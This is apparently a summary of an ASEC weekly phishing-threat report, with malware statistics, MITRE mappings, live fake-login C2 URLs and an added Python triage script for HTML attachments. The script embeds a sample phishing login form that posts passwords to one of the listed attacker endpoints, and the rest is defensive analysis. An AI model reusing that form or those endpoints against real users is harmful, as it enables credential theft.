ASEC Weekly Phishing Email Threat Trends (April 9th, 2023 – April 15th, 2023) – ASEC BLOG

ASEC monitors phishing email threats focused on attachments, highlighting FakePage as the dominant method that imitates real login pages to harvest credentials, followed by Downloader, Worm, and Infostealer families distributing malware and stealing data. The report also outlines distribution cases, file extensions, and fake login URL infrastructure (C2) used by actors, plus user guidance and MITRE mappings. #FakePage #SmokeLoader #GuLoader #AgentTesla #FormBook #DHL #FedEx #ImportCustoms

Keypoints

  • FakePage attachments are the most prevalent phishing delivery method (57%), where pages imitate real login screens to steal credentials.
  • Downloader (12%) and Infostealer (9%, e.g., AgentTesla, FormBook) are common payloads; Worm (9%) also appears in attachments.
  • Other detected types include Trojan (6%), Backdoor (5%), and Dropper (1%), with attachment-based distribution mirroring weekly malware trends.
  • Files are distributed via HTML/HTM/SHTML for FakePage and via compressed formats (RAR, ZIP, 7Z, GZ, etc.) for other malware attachments.
  • Case distributions include both global FakePage campaigns and Korean-targeted variants, with numerous subject/attachment combinations.
  • The key keyword to beware of is “Import Customs”; a related phishing URL demonstrates how attackers lure users to fake login pages.

MITRE Techniques

  • [T1598] Phishing for Information – FakePages imitate login pages to harvest credentials, leading users to enter their account and password information. Quote: “FakePages are web pages where the threat actor has imitated the screen layout, logo, and font of the real login pages or advertising pages, leading users to enter their account and password information.”
  • [T1566] Phishing – Phishing emails with attachments are used to lure victims and deliver malware. Quote: “Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce users to access fake login pages or execute malware.”
  • [T1534] Internal Spearphishing – Lateral movement via internal spearphishing techniques. Quote: “Internal Spearphishing(Lateral Movement, ID:T1534)”

Indicators of Compromise

  • [URL] Fake Page C2 URLs – https://formspree.io/f/myyazkbv, http://ingitek.ru/bitrix/admin/csss/tt/xlss.php
  • [Filename] Email attachments used in FakePage/malware cases – invoice & Tracking NumberHT2.html, Tax_Notification.html
  • [Domain] Additional phishing domains observed – formcarry.io, vigilant-rubin.185-236-228-67.plesk.page
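A defender-side triage check for the HTML/HTM/SHTML FakePage attachments described above, written as an added example (not code from ASEC or the original post): it parses an attachment, extracts every form's submit target, and flags forms whose action host matches the fake-page C2 domains listed in this report's IoCs, or which collect a password and post it to any external host. The sample attachment below is constructed for the example; the function and category names are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Fake-page C2 domains taken from this report's IoC list.
IOC_DOMAINS = {
    "formspree.io",
    "ingitek.ru",
    "formcarry.io",
    "vigilant-rubin.185-236-228-67.plesk.page",
}


class FormExtractor(HTMLParser):
    """Collects each <form>'s action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None when written without a value
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _matches_ioc(host):
    # Match the domain itself or any subdomain of it.
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def triage_html(html_text):
    """Return a list of (finding, host) tuples for suspicious forms in an HTML attachment."""
    parser = FormExtractor()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        host = _host(form["action"])
        if _matches_ioc(host):
            findings.append(("known_fakepage_c2", host))
        elif form["has_password"] and host:
            # A local HTML attachment that ships credentials to a remote host
            # is the FakePage pattern even when the host is not yet an IoC.
            findings.append(("password_form_to_external_host", host))
    return findings


# Constructed sample attachment imitating a mail login page (not a real capture).
SAMPLE_ATTACHMENT = """<html><body>
<img src="logo.png" alt="Webmail login">
<form method="post" action="https://formspree.io/f/myyazkbv">
  <input type="email" name="email">
  <input type="password" name="passwd">
  <button>Sign in</button>
</form>
</body></html>"""

if __name__ == "__main__":
    for finding, host in triage_html(SAMPLE_ATTACHMENT):
        print(f"{finding}: {host}")
```

Run it over quarantined attachments with extensions HTML/HTM/SHTML before delivery; the `known_fakepage_c2` finding is a high-confidence block, while `password_form_to_external_host` is a review-queue signal that catches the same pattern on hosts not yet in the IoC list.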

Read more: https://asec.ahnlab.com/en/51821/